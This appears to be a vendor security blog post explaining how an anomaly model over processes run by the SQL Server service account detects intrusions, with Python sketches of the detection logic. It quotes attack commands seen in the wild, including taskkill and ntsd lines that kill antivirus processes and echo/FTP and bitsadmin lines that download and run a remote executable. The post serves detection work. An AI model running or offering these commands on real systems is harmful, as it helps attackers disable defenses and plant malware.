Earlier this year, Greg Cottingham wrote a great article breaking down an example of an attack against SQL Server detected by Azure Security Center. In this post, we'll go into more detail on how Security Center analyzes data at scale to detect these types of attacks, and how the output from these approaches can be used to pivot to other intrusions that share common techniques.
With attack techniques rapidly evolving, many organizations are struggling to keep pace. This is exacerbated by a scarcity of security talent, and companies can no longer rely solely on detections written by human beings. By baking the intuition of human security analysts into algorithms, Azure Security Center can automatically adapt to changing attack patterns.
Let’s look at how Security Center uses this approach to detect attacks against SQL Server. By analyzing the processes executed by the MSSQLSERVER account, we see that it is very stable under normal circumstances – it performs a fixed set of actions, almost all the time. The stability of this account allows us to build a model that detects the anomalous activity that occurs when the account comes under attack.
Building a model
Before Security Center can construct a model of this data, it performs some pre-processing to collapse process executions that run out of similar directories; otherwise, the model would treat these as different processes. It uses a distance function over process directories to cluster executions, then aggregates prevalence where a process name is shared. An example of this process can be seen below.
This can be reduced to the single summarized state:
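To make the collapsing step concrete, here is a minimal Python sketch. The function names, the similarity measure (a simple string ratio over directory paths), and the 0.8 threshold are all illustrative assumptions, not Security Center's actual implementation; they just show how executions sharing a process name and running from similar directories can be merged and their prevalence summed.

```python
from difflib import SequenceMatcher

def dir_similarity(a: str, b: str) -> float:
    """Similarity ratio between two directory paths (0..1)."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

def collapse_executions(events, threshold=0.8):
    """Group executions that share a process name and run from
    similar directories, summing their observed counts."""
    clusters = []  # each cluster: {"name": ..., "dirs": [...], "count": n}
    for name, directory, count in events:
        for c in clusters:
            if c["name"] == name and any(
                dir_similarity(directory, d) >= threshold for d in c["dirs"]
            ):
                c["dirs"].append(directory)
                c["count"] += count
                break
        else:
            clusters.append({"name": name, "dirs": [directory], "count": count})
    return clusters

# Hypothetical observations: the same binary dropped into two
# randomly named directories collapses to one summarized state.
events = [
    ("svn.exe", r"c:\users\public\tmp_a1", 3),
    ("svn.exe", r"c:\users\public\tmp_b2", 2),
    ("sqlservr.exe", r"c:\program files\mssql\binn", 900),
]
print(collapse_executions(events))
```

With this grouping, the two `svn.exe` entries reduce to a single state with an aggregated count, while the legitimate server binary remains its own cluster.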
It also manipulates the data to capture hosted executions, such as regsvr32.exe and rundll32.exe, which may be common in themselves but can be used to run other files. By treating the hosted file as an execution in its own right, the model gains insight into any code run by this mechanism.
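A rough sketch of that normalization step, in Python: the host-process list and the command-line parsing below are simplified assumptions (real command lines need quoting and flag handling), but they illustrate how the file launched by a hosting process can be emitted as its own execution event.

```python
import re

# Built-in processes that commonly host other code (illustrative list).
HOSTS = {"rundll32.exe", "regsvr32.exe"}

def expand_hosted(process_name: str, command_line: str):
    """Yield the process itself, plus any file it hosts, so hosted
    code is counted as an execution in its own right."""
    name = process_name.lower()
    yield name
    if name in HOSTS:
        # First path-like token ending in a loadable extension,
        # excluding the host binary itself (simplified parsing).
        for m in re.finditer(r"[\w:\\.~-]+\.(?:dll|exe|ocx|scr)",
                             command_line, re.I):
            token = m.group(0).lower()
            if not token.endswith(name):
                yield token
                break

print(list(expand_hosted(
    "rundll32.exe", r"rundll32.exe c:\temp\payload.dll,Install")))
```

Here the model would record both the common `rundll32.exe` execution and the far rarer hosted DLL, and it is the latter that carries the signal.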
With this normalized data, the Azure Security Center detection engine can plot the prevalence of processes executed by MSSQLSERVER in a subscription. Due to the stability of this account, this simple approach produces a robust model of normal behavior by process name and location. A visualization of this model can be seen in the graph below.
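In code, a prevalence model of this kind can be sketched as follows. The counts, paths, and the 1% threshold are invented for illustration; the point is simply that an account as stable as MSSQLSERVER yields a sharply peaked distribution, so anything in the low-prevalence tail (or never seen at all) stands out.

```python
from collections import Counter

def build_model(executions):
    """Map each (process name, directory) pair to its prevalence
    among all executions observed for an account."""
    counts = Counter(executions)
    total = len(executions)
    return {proc: n / total for proc, n in counts.items()}

def anomalies(model, executions, threshold=0.01):
    """Executions falling in the low-prevalence tail of the model;
    processes never seen before score 0 and are always flagged."""
    return [e for e in dict.fromkeys(executions)
            if model.get(e, 0.0) < threshold]

# Hypothetical baseline: the stable, repetitive behavior of MSSQLSERVER.
baseline = [("sqlservr.exe", r"c:\program files\mssql\binn")] * 98 + \
           [("sqlceip.exe", r"c:\program files\mssql\binn")] * 2
model = build_model(baseline)

# New observations, including a never-before-seen debugger execution.
observed = [("sqlservr.exe", r"c:\program files\mssql\binn"),
            ("ntsd.exe", r"c:\windows\system32")]
print(anomalies(model, observed))
```

Against the baseline, the routine server process passes unremarked while the debugger execution is flagged for inspection.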
When an attack surface like SQL Server is targeted, an attacker’s first few actions are highly constrained. They can try various tactics, all of which leave a trail of process execution events. In the example below, we show the same model built by Security Center using data from a subscription at a time when it was experiencing a SQL Server attack. This time, the model finds anomalies in the tail of low-prevalence executions that contain some interesting data.
taskkill /im 360rp.exe /f
taskkill /im 360sd.exe /f
taskkill /im 360rps.exe /f
ntsd -c q -pn 360rp.exe
ntsd -c q -pn 360sd.exe
ntsd -c q -pn 360rps.exe
In the first phase, we see several attempts to disable the anti-virus engine running on the host. The first uses the built-in tool taskkill to end the process. The second uses the debugger ntsd, attaching to the process it wishes to disrupt via the -pn argument and executing the command 'q' once it has successfully attached to the target. The 'q' command causes the debugger to terminate the target application.
With the anti-virus engine disabled, the attacker is free to download and run their first-stage payload from the internet. They do this in a couple of different ways:
The first is over the FTP protocol. We see the attacker use the echo command to write a series of FTP commands to a file:
echo open xxx.xxx.xxx.xxx>So.2
echo 111>>So.2
echo 000>>So.2
echo get Svn.exe >>So.2
echo bye
The commands are then executed:
The file is deleted, and the executable is run:
del So.2
Svn.exe
In case this method of downloading the executable fails, the attacker falls back to a secondary mechanism of fetching the file from the same address, this time over HTTP:
Here we see the attacker downloading the executable file from the internet using the built-in bitsadmin tool:
Using machine learning, Azure Security Center alerts on anomalous activity like this – all without specialist knowledge or human intervention. Here is how one of these alerts looks inside Azure Security Center:
Mining the output
Although this approach is limited to detecting attacks in a very specific scenario, it also acts as a detection factory, automating the discovery of new techniques used by attackers.
Let’s look again at the bitsadmin command:
bitsadmin /transfer n c:\Users\Public\xxx.exe
On close inspection, this looks like a general technique that attackers can use to execute a remote file using a built-in capability of the operating system, but it was surfaced to us by an algorithm rather than a security expert.
While legitimate use of bitsadmin is common, the remote location, job name, and destination directory of the executable are suspicious. This provides the basis for a new detection, specifically targeted at unusual bitsadmin executions, independent of whether or not they are run by the MSSQLSERVER account.
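A detection of that shape might look something like the following sketch. The directory list, the specific signals, and the function itself are hypothetical; it only illustrates the idea of flagging bitsadmin transfer jobs that pull a remote executable into a world-writable location, regardless of which account runs them.

```python
# Hypothetical heuristic: flag bitsadmin /transfer jobs that fetch a
# remote executable into a commonly abused, world-writable directory.
SUSPICIOUS_DIRS = (r"c:\users\public", r"c:\windows\temp")

def suspicious_bitsadmin(command_line: str) -> bool:
    cmd = command_line.lower()
    if "bitsadmin" not in cmd or "/transfer" not in cmd:
        return False
    # Signal 1: the source is a remote location.
    remote = any(p in cmd for p in ("http://", "https://", "ftp://"))
    # Signal 2: the destination is an executable in a suspicious directory.
    writes_exe = (any(d in cmd for d in SUSPICIOUS_DIRS)
                  and cmd.rstrip('"').endswith(".exe"))
    return remote and writes_exe

# Remote exe dropped into a public directory -> flagged.
print(suspicious_bitsadmin(
    r'bitsadmin /transfer n http://example.invalid/a.exe c:\users\public\a.exe'))
# A benign-looking update job written to an app's own directory -> not flagged.
print(suspicious_bitsadmin(
    r'bitsadmin /transfer update https://example.invalid/patch.msi c:\program files\app\patch.msi'))
```

In practice such a rule would be tuned against the prevalence of legitimate bitsadmin jobs in each subscription rather than hard-coded, but the shape of the signal is the same.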
Alerts generated by this approach, such as the bitsadmin example, can be mined for suitability as standalone detections. These, in turn, alert customers to other attacks on their subscriptions where common techniques are shared by a different attack vector.
By using Azure Security Center, customers with SQL Server deployments automatically benefit from this approach to detection. Because it is anomaly based, it adapts to changing tactics, alerting on new attacks without involvement from a human expert. The new techniques captured by this approach generate detection opportunities that feed back into protecting all Security Center customers.
For more information on the types of attacks mentioned in this article and how to mitigate them, see the blog, "How Azure Security Center helps reveal a Cyberattack."
To learn more about detection in Azure Security Center, see the following: